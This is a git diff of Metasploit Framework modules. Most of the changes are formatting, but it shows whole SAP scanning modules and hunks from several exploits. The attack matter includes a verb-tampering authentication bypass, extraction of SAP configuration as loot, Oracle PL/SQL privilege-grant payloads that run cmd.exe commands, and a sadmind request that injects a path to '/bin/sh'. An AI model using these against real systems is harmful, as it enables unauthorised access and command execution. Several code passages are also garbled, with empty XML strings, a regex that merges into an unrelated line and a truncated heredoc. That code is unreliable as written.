b62f0fb723..eefefb3b19 100644 --- a/modules/auxiliary/scanner/sap/sap_icm_urlscan.rb +++ b/modules/auxiliary/scanner/sap/sap_icm_urlscan.rb @@ -1,157 +1,157 @@ -## -# $Id$ -## - -## -# This file is part of the Metasploit Framework and may be subject to -# redistribution and commercial restrictions. Please see the Metasploit -# Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ -## - -require 'rex/proto/http' -require 'msf/core' - -class Metasploit3 < Msf::Auxiliary - - include Msf::Exploit::Remote::HttpClient - include Msf::Auxiliary::Scanner - include Msf::Auxiliary::Report - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'SAP URL Scanner', - 'Description' => %q{ - This module scans for commonly found SAP Internet Communication Manager URLs - and outputs return codes for the user. - }, - 'Version' => '$Revision$', - 'Author' => [ 'Chris John Riley' ], - 'References' => - [ - [ 'CVE', '2010-0738' ] # VERB auth bypass - ], - 'License' => MSF_LICENSE - )) - - register_options( - [ - OptString.new('VERB', [true, "Verb for auth bypass testing", "HEAD"]), - OptString.new('URLFILE', [true, "SAP ICM Paths File", "sap_icm_paths.txt"]) - ], self.class) - end - - # Base Structure of module borrowed from jboss_vulnscan - def run_host(ip) - # If URLFILE is set empty, obviously the user made a silly mistake - if datastore['URLFILE'].empty? - print_error("Please specify a URLFILE") - return - end - - # Initialize the actual URLFILE path - if datastore['URLFILE'] == "sap_icm_paths.txt" - url_file = "#{Msf::Config.data_directory}/wordlists/#{datastore['URLFILE']}" - else - # Not the default sap_icm_paths file - url_file = datastore['URLFILE'] - end - - # If URLFILE path doesn't exist, no point to continue the rest of the script - if not File.exists?(url_file) - print_error("Required URL list #{url_file} was not found") - return - end - - res = send_request_cgi( - { - 'uri' => "/" + Rex::Text.rand_text_alpha(12), - 'method' => 'GET', - 'ctype' => 'text/plain', - }, 20) - - if res - print_status("Note: Please note these URLs may or may not be of interest based on server configuration") - @info = [] - if not res.headers['Server'].nil? - @info << res.headers['Server'] - print_status("#{rhost}:#{rport} Server responded with the following Server Header: #{@info[0]}") - else - print_status("#{rhost}:#{rport} Server responded with a blank or missing Server Header") - end - - if (res.body and /class="note">(.*)code:(.*) url, - 'method' => 'GET', - 'ctype' => 'text/plain', - }, 20) - - if (res) - if not @info.include?(res.headers['Server']) and not res.headers['Server'].nil? - print_good("New server header seen [#{res.headers['Server']}]") - @info << res.headers['Server'] #Add To seen server headers - end - - case - when res.code == 200 - print_good("#{rhost}:#{rport} #{url} - does not require authentication (200)") - when res.code == 403 - print_good("#{rhost}:#{rport} #{url} - restricted (403)") - when res.code == 401 - print_good("#{rhost}:#{rport} #{url} - requires authentication (401): #{res.headers['WWW-Authenticate']}") - # Attempt verb tampering bypass - bypass_auth(url) - when res.code == 404 - # Do not return by default, only display in verbose mode - vprint_status("#{rhost}:#{rport} #{url.strip} - not found (404)") - when res.code == 500 - print_good("#{rhost}:#{rport} #{url} - produced a server error (500)") - when res.code == 301, res.code == 302 - print_good("#{rhost}:#{rport} #{url} - redirected (#{res.code}) to #{res.headers['Location']} (not following)") - else - print_status("#{rhost}:#{rport} - unhandle response code #{res.code}") - end - - else - print_status("#{rhost}:#{rport} #{url} - not found (No Repsonse code Received)") - end - end - - def bypass_auth(url) - print_status("#{rhost}:#{rport} Check for verb tampering (#{datastore['VERB']})") - - res = send_request_raw({ - 'uri' => url, - 'method' => datastore['VERB'], - 'version' => '1.0' # 1.1 makes the head request wait on timeout for some reason - }, 20) - - if (res and res.code == 200) - print_good("#{rhost}:#{rport} Got authentication bypass via HTTP verb tampering") - else - print_status("#{rhost}:#{rport} Could not get authentication bypass via HTTP verb tampering") - end - end -end +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'rex/proto/http' +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::Remote::HttpClient + include Msf::Auxiliary::Scanner + include Msf::Auxiliary::Report + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'SAP URL Scanner', + 'Description' => %q{ + This module scans for commonly found SAP Internet Communication Manager URLs + and outputs return codes for the user. + }, + 'Version' => '$Revision$', + 'Author' => [ 'Chris John Riley' ], + 'References' => + [ + [ 'CVE', '2010-0738' ] # VERB auth bypass + ], + 'License' => MSF_LICENSE + )) + + register_options( + [ + OptString.new('VERB', [true, "Verb for auth bypass testing", "HEAD"]), + OptString.new('URLFILE', [true, "SAP ICM Paths File", "sap_icm_paths.txt"]) + ], self.class) + end + + # Base Structure of module borrowed from jboss_vulnscan + def run_host(ip) + # If URLFILE is set empty, obviously the user made a silly mistake + if datastore['URLFILE'].empty? + print_error("Please specify a URLFILE") + return + end + + # Initialize the actual URLFILE path + if datastore['URLFILE'] == "sap_icm_paths.txt" + url_file = "#{Msf::Config.data_directory}/wordlists/#{datastore['URLFILE']}" + else + # Not the default sap_icm_paths file + url_file = datastore['URLFILE'] + end + + # If URLFILE path doesn't exist, no point to continue the rest of the script + if not File.exists?(url_file) + print_error("Required URL list #{url_file} was not found") + return + end + + res = send_request_cgi( + { + 'uri' => "/" + Rex::Text.rand_text_alpha(12), + 'method' => 'GET', + 'ctype' => 'text/plain', + }, 20) + + if res + print_status("Note: Please note these URLs may or may not be of interest based on server configuration") + @info = [] + if not res.headers['Server'].nil? + @info << res.headers['Server'] + print_status("#{rhost}:#{rport} Server responded with the following Server Header: #{@info[0]}") + else + print_status("#{rhost}:#{rport} Server responded with a blank or missing Server Header") + end + + if (res.body and /class="note">(.*)code:(.*) url, + 'method' => 'GET', + 'ctype' => 'text/plain', + }, 20) + + if (res) + if not @info.include?(res.headers['Server']) and not res.headers['Server'].nil? + print_good("New server header seen [#{res.headers['Server']}]") + @info << res.headers['Server'] #Add To seen server headers + end + + case + when res.code == 200 + print_good("#{rhost}:#{rport} #{url} - does not require authentication (200)") + when res.code == 403 + print_good("#{rhost}:#{rport} #{url} - restricted (403)") + when res.code == 401 + print_good("#{rhost}:#{rport} #{url} - requires authentication (401): #{res.headers['WWW-Authenticate']}") + # Attempt verb tampering bypass + bypass_auth(url) + when res.code == 404 + # Do not return by default, only display in verbose mode + vprint_status("#{rhost}:#{rport} #{url.strip} - not found (404)") + when res.code == 500 + print_good("#{rhost}:#{rport} #{url} - produced a server error (500)") + when res.code == 301, res.code == 302 + print_good("#{rhost}:#{rport} #{url} - redirected (#{res.code}) to #{res.headers['Location']} (not following)") + else + print_status("#{rhost}:#{rport} - unhandle response code #{res.code}") + end + + else + print_status("#{rhost}:#{rport} #{url} - not found (No Repsonse code Received)") + end + end + + def bypass_auth(url) + print_status("#{rhost}:#{rport} Check for verb tampering (#{datastore['VERB']})") + + res = send_request_raw({ + 'uri' => url, + 'method' => datastore['VERB'], + 'version' => '1.0' # 1.1 makes the head request wait on timeout for some reason + }, 20) + + if (res and res.code == 200) + print_good("#{rhost}:#{rport} Got authentication bypass via HTTP verb tampering") + else + print_status("#{rhost}:#{rport} Could not get authentication bypass via HTTP verb tampering") + end + end +end diff --git a/modules/auxiliary/scanner/sap/sap_mgmt_con_abaplog.rb b/modules/auxiliary/scanner/sap/sap_mgmt_con_abaplog.rb old mode 100755 new mode 100644 diff --git a/modules/auxiliary/scanner/sap/sap_mgmt_con_brute_login.rb b/modules/auxiliary/scanner/sap/sap_mgmt_con_brute_login.rb old mode 100755 new mode 100644 diff --git a/modules/auxiliary/scanner/sap/sap_mgmt_con_extractusers.rb b/modules/auxiliary/scanner/sap/sap_mgmt_con_extractusers.rb old mode 100755 new mode 100644 diff --git a/modules/auxiliary/scanner/sap/sap_mgmt_con_getenv.rb b/modules/auxiliary/scanner/sap/sap_mgmt_con_getenv.rb old mode 100755 new mode 100644 diff --git a/modules/auxiliary/scanner/sap/sap_mgmt_con_getlogfiles.rb b/modules/auxiliary/scanner/sap/sap_mgmt_con_getlogfiles.rb old mode 100755 new mode 100644 diff --git a/modules/auxiliary/scanner/sap/sap_mgmt_con_getprocessparameter.rb b/modules/auxiliary/scanner/sap/sap_mgmt_con_getprocessparameter.rb index c6d06dfd43..c0c9b600f0 100644 --- a/modules/auxiliary/scanner/sap/sap_mgmt_con_getprocessparameter.rb +++ b/modules/auxiliary/scanner/sap/sap_mgmt_con_getprocessparameter.rb @@ -1,192 +1,192 @@ -## -# $Id$ -## - -## -# This file is part of the Metasploit Framework and may be subject to -# redistribution and commercial restrictions. Please see the Metasploit -# Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ -## - -require 'msf/core' - -class Metasploit4 < Msf::Auxiliary - - include Msf::Exploit::Remote::HttpClient - include Msf::Auxiliary::Report - include Msf::Auxiliary::Scanner - - def initialize - super( - 'Name' => 'SAP Management Console Get Process Parameters', - 'Version' => '$Revision$', - 'Description' => %q{ - This module simply attempts to output a SAP process parameters and - configuration settings through the SAP Management Console SOAP Interface. - }, - 'References' => - [ - # General - [ 'URL', 'http://blog.c22.cc' ] - ], - 'Author' => [ 'Chris John Riley' ], - 'License' => MSF_LICENSE - ) - - register_options( - [ - Opt::RPORT(50013), - OptString.new('URI', [false, 'Path to the SAP Management Console ', '/']), - OptString.new('MATCH', [false, 'Display matches e.g login/', '']), - ], self.class) - register_autofilter_ports([ 50013 ]) - deregister_options('RHOST') - end - - def rport - datastore['RPORT'] - end - - def run_host(ip) - res = send_request_cgi({ - 'uri' => "/#{datastore['URI']}", - 'method' => 'GET', - 'headers' => - { - 'User-Agent' => datastore['UserAgent'] - } - }, 25) - - if not res - print_error("#{rhost}:#{rport} [SAP] Unable to connect") - return - end - - getprocparam(ip) - end - - def getprocparam(rhost) - verbose = datastore['VERBOSE'] - print_status("[SAP] Connecting to SAP Management Console SOAP Interface on #{rhost}:#{rport}") - success = false - soapenv = 'http://schemas.xmlsoap.org/soap/envelope/' - xsi = 'http://www.w3.org/2001/XMLSchema-instance' - xs = 'http://www.w3.org/2001/XMLSchema' - sapsess = 'http://www.sap.com/webas/630/soap/features/session/' - ns1 = 'ns1:GetProcessParameter' - - data = '' + "\r\n" - data << '' + "\r\n" - data << '' + "\r\n" - data << '' + "\r\n" - data << 'true' + "\r\n" - data << '' + "\r\n" - data << '' + "\r\n" - data << '' + "\r\n" - data << '<' + ns1 + ' xmlns:ns1="urn:SAPControl">' + "\r\n" - data << '' + "\r\n" - data << '' + "\r\n\r\n" - - begin - res = send_request_raw({ - 'uri' => "/#{datastore['URI']}", - 'method' => 'POST', - 'data' => data, - 'headers' => - { - 'Content-Length' => data.length, - 'SOAPAction' => '""', - 'Content-Type' => 'text/xml; charset=UTF-8', - } - }, 30) - - if not res - print_error("#{rhost}:#{rport} [SAP] Unable to connect") - return - end - - if res.code == 200 - case res.body - when nil - # Nothing - when /(.*)<\/parameter>/i - body = [] - body = res.body - success = true - end - elsif res.code == 500 - case res.body - when /(.*)<\/faultstring>/i - faultcode = $1.strip - fault = true - end - else - print_error("#{rhost}:#{rport} [SAP] Unable to communicate with remote host.") - end - - rescue ::Rex::ConnectionError - print_error("#{rhost}:#{rport} [SAP] Unable to attempt authentication") - return - end - - if success - #Only stoor loot if MATCH is not selected - if datastore['MATCH'].empty? - print_good("#{rhost}:#{rport} [SAP] Process Parameters: Entries extracted to loot") - store_loot( - "sap.getprocessparameters", - "text/xml", - rhost, - res.body, - ".xml" - ) - else - name_match = Regexp.new(datastore['MATCH'], [Regexp::EXTENDED, 'n']) - print_status("[SAP] Regex match selected, skipping loot storage") - print_status("#{rhost}:#{rport} [SAP] Attempting to display configuration matches for #{name_match}") - - saptbl = Msf::Ui::Console::Table.new( - Msf::Ui::Console::Table::Style::Default, - 'Header' => "[SAP] Process Parameters", - 'Prefix' => "\n", - 'Indent' => 1, - 'Columns' => - [ - "Name", - "Description", - "Value" - ]) - - xmldata = REXML::Document.new(body) - xmlpath = '/SOAP-ENV:Envelope/SOAP-ENV:Body/' - xmlpath << '/SAPControl:GetProcessParameterResponse' - xmlpath << '/parameter/item' - xmldata.elements.each(xmlpath) do | ele | - if not datastore['MATCH'].empty? and ele.elements["name"].text.match(/#{name_match}/) - name = ele.elements["name"].text if not ele.elements["name"].nil? - desc = ele.elements["description"].text if not ele.elements["description"].nil? - desc = '' if desc.nil? - val = ele.elements["value"].text if not ele.elements["value"].nil? - val = '' if val.nil? - saptbl << [ name, desc, val ] - end - end - - print_status("[SAP] Process Parameter Results for #{name_match}\n #{saptbl.to_s}") if not saptbl.to_s.empty? - end - - return - - elsif fault - print_error("#{rhost}:#{rport} [SAP] Error code: #{faultcode}") - return - - else - # Something has gone horribly wrong - print_error("#{rhost}:#{rport} [SAP] failed to request environment") - return - end - end -end +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' + +class Metasploit4 < Msf::Auxiliary + + include Msf::Exploit::Remote::HttpClient + include Msf::Auxiliary::Report + include Msf::Auxiliary::Scanner + + def initialize + super( + 'Name' => 'SAP Management Console Get Process Parameters', + 'Version' => '$Revision$', + 'Description' => %q{ + This module simply attempts to output a SAP process parameters and + configuration settings through the SAP Management Console SOAP Interface. + }, + 'References' => + [ + # General + [ 'URL', 'http://blog.c22.cc' ] + ], + 'Author' => [ 'Chris John Riley' ], + 'License' => MSF_LICENSE + ) + + register_options( + [ + Opt::RPORT(50013), + OptString.new('URI', [false, 'Path to the SAP Management Console ', '/']), + OptString.new('MATCH', [false, 'Display matches e.g login/', '']), + ], self.class) + register_autofilter_ports([ 50013 ]) + deregister_options('RHOST') + end + + def rport + datastore['RPORT'] + end + + def run_host(ip) + res = send_request_cgi({ + 'uri' => "/#{datastore['URI']}", + 'method' => 'GET', + 'headers' => + { + 'User-Agent' => datastore['UserAgent'] + } + }, 25) + + if not res + print_error("#{rhost}:#{rport} [SAP] Unable to connect") + return + end + + getprocparam(ip) + end + + def getprocparam(rhost) + verbose = datastore['VERBOSE'] + print_status("[SAP] Connecting to SAP Management Console SOAP Interface on #{rhost}:#{rport}") + success = false + soapenv = 'http://schemas.xmlsoap.org/soap/envelope/' + xsi = 'http://www.w3.org/2001/XMLSchema-instance' + xs = 'http://www.w3.org/2001/XMLSchema' + sapsess = 'http://www.sap.com/webas/630/soap/features/session/' + ns1 = 'ns1:GetProcessParameter' + + data = '' + "\r\n" + data << '' + "\r\n" + data << '' + "\r\n" + data << '' + "\r\n" + data << 'true' + "\r\n" + data << '' + "\r\n" + data << '' + "\r\n" + data << '' + "\r\n" + data << '<' + ns1 + ' xmlns:ns1="urn:SAPControl">' + "\r\n" + data << '' + "\r\n" + data << '' + "\r\n\r\n" + + begin + res = send_request_raw({ + 'uri' => "/#{datastore['URI']}", + 'method' => 'POST', + 'data' => data, + 'headers' => + { + 'Content-Length' => data.length, + 'SOAPAction' => '""', + 'Content-Type' => 'text/xml; charset=UTF-8', + } + }, 30) + + if not res + print_error("#{rhost}:#{rport} [SAP] Unable to connect") + return + end + + if res.code == 200 + case res.body + when nil + # Nothing + when /(.*)<\/parameter>/i + body = [] + body = res.body + success = true + end + elsif res.code == 500 + case res.body + when /(.*)<\/faultstring>/i + faultcode = $1.strip + fault = true + end + else + print_error("#{rhost}:#{rport} [SAP] Unable to communicate with remote host.") + end + + rescue ::Rex::ConnectionError + print_error("#{rhost}:#{rport} [SAP] Unable to attempt authentication") + return + end + + if success + #Only stoor loot if MATCH is not selected + if datastore['MATCH'].empty? + print_good("#{rhost}:#{rport} [SAP] Process Parameters: Entries extracted to loot") + store_loot( + "sap.getprocessparameters", + "text/xml", + rhost, + res.body, + ".xml" + ) + else + name_match = Regexp.new(datastore['MATCH'], [Regexp::EXTENDED, 'n']) + print_status("[SAP] Regex match selected, skipping loot storage") + print_status("#{rhost}:#{rport} [SAP] Attempting to display configuration matches for #{name_match}") + + saptbl = Msf::Ui::Console::Table.new( + Msf::Ui::Console::Table::Style::Default, + 'Header' => "[SAP] Process Parameters", + 'Prefix' => "\n", + 'Indent' => 1, + 'Columns' => + [ + "Name", + "Description", + "Value" + ]) + + xmldata = REXML::Document.new(body) + xmlpath = '/SOAP-ENV:Envelope/SOAP-ENV:Body/' + xmlpath << '/SAPControl:GetProcessParameterResponse' + xmlpath << '/parameter/item' + xmldata.elements.each(xmlpath) do | ele | + if not datastore['MATCH'].empty? and ele.elements["name"].text.match(/#{name_match}/) + name = ele.elements["name"].text if not ele.elements["name"].nil? + desc = ele.elements["description"].text if not ele.elements["description"].nil? + desc = '' if desc.nil? + val = ele.elements["value"].text if not ele.elements["value"].nil? + val = '' if val.nil? + saptbl << [ name, desc, val ] + end + end + + print_status("[SAP] Process Parameter Results for #{name_match}\n #{saptbl.to_s}") if not saptbl.to_s.empty? + end + + return + + elsif fault + print_error("#{rhost}:#{rport} [SAP] Error code: #{faultcode}") + return + + else + # Something has gone horribly wrong + print_error("#{rhost}:#{rport} [SAP] failed to request environment") + return + end + end +end diff --git a/modules/auxiliary/scanner/sap/sap_mgmt_con_instanceproperties.rb b/modules/auxiliary/scanner/sap/sap_mgmt_con_instanceproperties.rb old mode 100755 new mode 100644 diff --git a/modules/auxiliary/scanner/sap/sap_mgmt_con_listlogfiles.rb b/modules/auxiliary/scanner/sap/sap_mgmt_con_listlogfiles.rb old mode 100755 new mode 100644 diff --git a/modules/auxiliary/scanner/sap/sap_mgmt_con_startprofile.rb b/modules/auxiliary/scanner/sap/sap_mgmt_con_startprofile.rb old mode 100755 new mode 100644 diff --git a/modules/auxiliary/scanner/sap/sap_mgmt_con_version.rb b/modules/auxiliary/scanner/sap/sap_mgmt_con_version.rb old mode 100755 new mode 100644 diff --git a/modules/auxiliary/scanner/sap/sap_service_discovery.rb b/modules/auxiliary/scanner/sap/sap_service_discovery.rb old mode 100755 new mode 100644 diff --git a/modules/auxiliary/scanner/voice/recorder.rb b/modules/auxiliary/scanner/voice/recorder.rb index 3ab038150b..86cf307d55 100644 --- a/modules/auxiliary/scanner/voice/recorder.rb +++ b/modules/auxiliary/scanner/voice/recorder.rb @@ -1,5 +1,5 @@ ## -# $Id: call_scanner.rb 13183 2011-07-15 15:33:35Z egypt $ +# $Id$ ## ## @@ -19,7 +19,7 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'Telephone Line Voice Scanner', - 'Version' => '$Revision: 13183 $', + 'Version' => '$Revision$', 'Description' => 'This module dials a range of phone numbers and records audio from each answered call', 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, diff --git a/modules/auxiliary/server/capture/smb.rb b/modules/auxiliary/server/capture/smb.rb index 2bea9bc9a2..cbe352e33b 100644 --- a/modules/auxiliary/server/capture/smb.rb +++ b/modules/auxiliary/server/capture/smb.rb @@ -61,10 +61,12 @@ class Metasploit3 < Msf::Auxiliary register_advanced_options( [ - OptBool.new("SMB_EXTENDED_SECURITY", [ true, "Use smb extended security negociation, when set client will use ntlmssp, if not then client will use classic lanman authentification", false ]), - OptBool.new("NTLM_UseNTLM2_session", [ true, "activate the 'Negotiate NTLM2 key' flag in ntlm authentification when smb extended security negociation is set, client will use ntlm2_session instead of ntlmv1 (default on win 2K and above)", false ]), - OptBool.new("USE_GSS_NEGOCIATION", [ true, "Send an gss_security blob in smb_negociate response when smb extended security is set, when this flag is not set windows will respond without gss encapsulation, ubuntu will still use gss", true ]), - OptString.new('DOMAIN_NAME', [ true, "The domain name used during smb exchange with smb extended security set ", "anonymous" ]) + OptBool.new("SMB_EXTENDED_SECURITY", [ true, "Use smb extended security negociation, when set client will use ntlmssp, if not then client will use classic lanman authentification", false ]), + OptBool.new("NTLM_UseNTLM2_session", [ true, "Activate the 'negociate NTLM2 key' flag in NTLM authentication. " + + "When SMB extended security negociation is set, client will use ntlm2_session instead of ntlmv1 (default on win 2K and above)", false ]), + OptBool.new("USE_GSS_NEGOCIATION", [ true, "Send a gss_security blob in smb_negociate response when SMB extended security is set. " + + "When this flag is not set, Windows will respond without gss encapsulation, Ubuntu will still use gss.", true ]), + OptString.new('DOMAIN_NAME', [ true, "The domain name used during smb exchange with smb extended security set ", "anonymous" ]) ], self.class) end diff --git a/modules/auxiliary/server/webkit_xslt_dropper.rb b/modules/auxiliary/server/webkit_xslt_dropper.rb index b0cf03537c..cbef363e21 100644 --- a/modules/auxiliary/server/webkit_xslt_dropper.rb +++ b/modules/auxiliary/server/webkit_xslt_dropper.rb @@ -64,7 +64,7 @@ class Metasploit3 < Msf::Auxiliary - e - print_error("AIRPWN: failed to parse response file " \ + print_error("AIRPWN: failed to parse response file " + "#{r['file']}, #{e.class} #{e} #{e.backtrace}") end end else if r["file"] then - print_error "AIRPWN: Both 'response' and 'file' in yaml config, " \ - "defaulting to 'response'" + print_error "AIRPWN: Both 'response' and 'file' in yaml config, " + + "defaulting to 'response'" end r["txresponse"] = r["response"] diff --git a/modules/auxiliary/sqli/oracle/jvm_os_code_10g.rb b/modules/auxiliary/sqli/oracle/jvm_os_code_10g.rb index 985a8ea101..b0ec19f104 100644 --- a/modules/auxiliary/sqli/oracle/jvm_os_code_10g.rb +++ b/modules/auxiliary/sqli/oracle/jvm_os_code_10g.rb @@ -47,10 +47,16 @@ class Metasploit3 < Msf::Auxiliary name = Rex::Text.rand_text_alpha(rand(10) + 1) - package1 = "DECLARE POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;CURSOR C1 IS SELECT 'GRANT',USER(), 'SYS','java.io.FilePermission','" - package1 << "<" << ">','execute','ENABLED' from dual;BEGIN OPEN C1;FETCH C1 BULK COLLECT INTO POL;CLOSE C1;DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);END;" - package2 = "DECLARE POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;CURSOR C1 IS SELECT 'GRANT',USER(), 'SYS','java.lang.RuntimePermission','writeFileDescriptor',NULL,'ENABLED' FROM DUAL;BEGIN OPEN C1;FETCH C1 BULK COLLECT INTO POL;CLOSE C1;DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);END;" - package3 = "DECLARE POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;CURSOR C1 IS SELECT 'GRANT',USER(), 'SYS','java.lang.RuntimePermission','readFileDescriptor',NULL,'ENABLED' FROM DUAL;BEGIN OPEN C1;FETCH C1 BULK COLLECT INTO POL;CLOSE C1;DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);END;" + package1 = "DECLARE POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;" + + "CURSOR C1 IS SELECT 'GRANT',USER(), 'SYS','java.io.FilePermission','" + package1 << "<" << ">','execute','ENABLED' from dual;" + + "BEGIN OPEN C1;FETCH C1 BULK COLLECT INTO POL;CLOSE C1;DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);END;" + package2 = "DECLARE POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;" + + "CURSOR C1 IS SELECT 'GRANT',USER(), 'SYS','java.lang.RuntimePermission','writeFileDescriptor',NULL,'ENABLED' FROM DUAL;" + + "BEGIN OPEN C1;FETCH C1 BULK COLLECT INTO POL;CLOSE C1;DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);END;" + package3 = "DECLARE POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;" + + "CURSOR C1 IS SELECT 'GRANT',USER(), 'SYS','java.lang.RuntimePermission','readFileDescriptor',NULL,'ENABLED' FROM DUAL;" + + "BEGIN OPEN C1;FETCH C1 BULK COLLECT INTO POL;CLOSE C1;DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);END;" os_code = "select DBMS_JAVA_TEST.FUNCALL('oracle/aurora/util/Wrapper','main','c:\\windows\\system32\\cmd.exe', '/c', ' #{datastore['CMD']}')from dual" diff --git a/modules/auxiliary/vsploit/pii/web_pii.rb b/modules/auxiliary/vsploit/pii/web_pii.rb index b039d46be5..118495af8a 100644 --- a/modules/auxiliary/vsploit/pii/web_pii.rb +++ b/modules/auxiliary/vsploit/pii/web_pii.rb @@ -44,7 +44,7 @@ class Metasploit3 < Msf::Auxiliary def create_page # Webpage Title title = "vSploit PII Webserver" - sheep =< --------- @@ -61,7 +61,7 @@ class Metasploit3 < Msf::Auxiliary // ( // / ~~~~~ ~~~~ -EOF +EOS page = "" page << "\n\n" diff --git a/modules/exploits/linux/pptp/poptop_negative_read.rb b/modules/exploits/linux/pptp/poptop_negative_read.rb index 35f159ca95..da0bdf2b0e 100644 --- a/modules/exploits/linux/pptp/poptop_negative_read.rb +++ b/modules/exploits/linux/pptp/poptop_negative_read.rb @@ -79,7 +79,10 @@ class Metasploit3 < Msf::Exploit::Remote [ OptInt.new("PreReturnLength", [ true, "Space before we hit the return address. Affects PayloadSpace.", 220 ]), OptInt.new("RetLength", [ true, "Length of returns after payload.", 32 ]), - OptInt.new("ExtraSpace", [ true, "The exploit builds two protocol frames, the header frame and the control frame. ExtraSpace allows you use this space for the payload instead of the protocol (breaking the protocol, but still triggering the bug). If this value is <= 128, it doesn't really disobey the protocol, it just uses the Vendor and Hostname fields for payload data (these should eventually be filled in to look like a real client, ie windows). I've had successful exploitation with this set to 154, but nothing over 128 is suggested.", 0 ]), + OptInt.new("ExtraSpace", [ true, "The exploit builds two protocol frames, the header frame and the control frame. " + + "ExtraSpace allows you use this space for the payload instead of the protocol (breaking the protocol, but still triggering the bug). " + + "If this value is <= 128, it doesn't really disobey the protocol, it just uses the Vendor and Hostname fields for payload data " + + "(these should eventually be filled in to look like a real client, ie windows). I've had successful exploitation with this set to 154, but nothing over 128 is suggested.", 0 ]), OptString.new("Hostname", [ false, "PPTP Packet hostname", '' ]), OptString.new("Vendor", [ true, "PPTP Packet vendor", 'Microsoft Windows NT' ]), ], self.class) diff --git a/modules/exploits/multi/http/glassfish_deployer.rb b/modules/exploits/multi/http/glassfish_deployer.rb old mode 100755 new mode 100644 index 8b8111a227..d381b8681c --- a/modules/exploits/multi/http/glassfish_deployer.rb +++ b/modules/exploits/multi/http/glassfish_deployer.rb @@ -291,7 +291,7 @@ class Metasploit3 < Msf::Exploit::Remote res = send_request(path, @verbs['POST'], session, data, ctype) if (not res) print_error("Undeployment failed on #{path} - No Response") - else + else if res.code < 200 or res.code >= 300 print_error("Undeployment failed on #{path} - #{res.code.to_s}:#{res.message.to_s}") end @@ -333,10 +333,10 @@ class Metasploit3 < Msf::Exploit::Remote end # - # Return the formatted version of the POST data - # - def format_2_x_war(boundary,name,value=nil, war=nil) - data = '' + # Return the formatted version of the POST data + # + def format_2_x_war(boundary,name,value=nil, war=nil) + data = '' data << boundary data << "\r\nContent-Disposition: form-data; name=\"form:title:sheet1:section1:prop1:fileupload\"; " @@ -344,8 +344,8 @@ class Metasploit3 < Msf::Exploit::Remote data << war data << "\r\n" - return data - end + return data + end # # Return the formatted version of the POST data @@ -555,8 +555,8 @@ class Metasploit3 < Msf::Exploit::Remote ctype = "multipart/form-data; boundary=#{boundary}" elsif version == '2.x' or version == '9.x' ctype = "multipart/form-data; boundary=---------------------------#{boundary}" - typefield = '' - start = '' + typefield = '' + start = '' else ctype = "multipart/form-data; boundary=---------------------------#{boundary}" end @@ -687,7 +687,7 @@ class Metasploit3 < Msf::Exploit::Remote if (res and res.code.to_i == 200 and res.body.match(p) != nil) success = true end - end + end end if success == true diff --git a/modules/exploits/solaris/sunrpc/sadmind_adm_build_path.rb b/modules/exploits/solaris/sunrpc/sadmind_adm_build_path.rb index 2a7f73cd22..97fa44c3da 100644 --- a/modules/exploits/solaris/sunrpc/sadmind_adm_build_path.rb +++ b/modules/exploits/solaris/sunrpc/sadmind_adm_build_path.rb @@ -126,8 +126,8 @@ class Metasploit3 < Msf::Exploit::Remote header = XDR.encode(0) * 7 + - XDR.encode(6, 0, 0, 0, 4, 0, 4, 0x7f000001, 100232, 10, \ - 4, 0x7f000001, 100232, 10, 17, 30, 0, 0, 0, 0, \ + XDR.encode(6, 0, 0, 0, 4, 0, 4, 0x7f000001, 100232, 10, + 4, 0x7f000001, 100232, 10, 17, 30, 0, 0, 0, 0, hostname, 'system', rand_text_alpha(16)) body = diff --git a/modules/exploits/solaris/sunrpc/sadmind_exec.rb b/modules/exploits/solaris/sunrpc/sadmind_exec.rb index 326498ae5b..35003f7929 100644 --- a/modules/exploits/solaris/sunrpc/sadmind_exec.rb +++ b/modules/exploits/solaris/sunrpc/sadmind_exec.rb @@ -106,8 +106,8 @@ class Metasploit3 < Msf::Exploit::Remote def sadmind_request(host, command) header = XDR.encode(0) * 7 + - XDR.encode(6, 0, 0, 0, 4, 0, 4, 0x7f000001, 100232, 10, \ - 4, 0x7f000001, 100232, 10, 17, 30, 0, 0, 0, 0, \ + XDR.encode(6, 0, 0, 0, 4, 0, 4, 0x7f000001, 100232, 10, + 4, 0x7f000001, 100232, 10, 17, 30, 0, 0, 0, 0, host, 'system', '../../../bin/sh') body = diff --git a/modules/exploits/unix/webapp/php_vbulletin_template.rb b/modules/exploits/unix/webapp/php_vbulletin_template.rb index 892c62fca7..cdd9c259a2 100644 --- a/modules/exploits/unix/webapp/php_vbulletin_template.rb +++ b/modules/exploits/unix/webapp/php_vbulletin_template.rb @@ -86,7 +86,9 @@ class Metasploit3 < Msf::Exploit::Remote elsif datastore['HTTP::chunked'] == true b = /chunked Transfer-Encoding forbidden/.match(res.body) if b - raise RuntimeError, 'Target PHP installation does not support chunked encoding. Support for chunked encoded requests was added to PHP on 12/15/2005, try disabling HTTP::chunked and trying again.' + raise RuntimeError, 'Target PHP installation does not support chunked encoding. ' + + 'Support for chunked encoded requests was added to PHP on 12/15/2005. ' + + 'Try disabling HTTP::chunked and trying again.' end end end diff --git 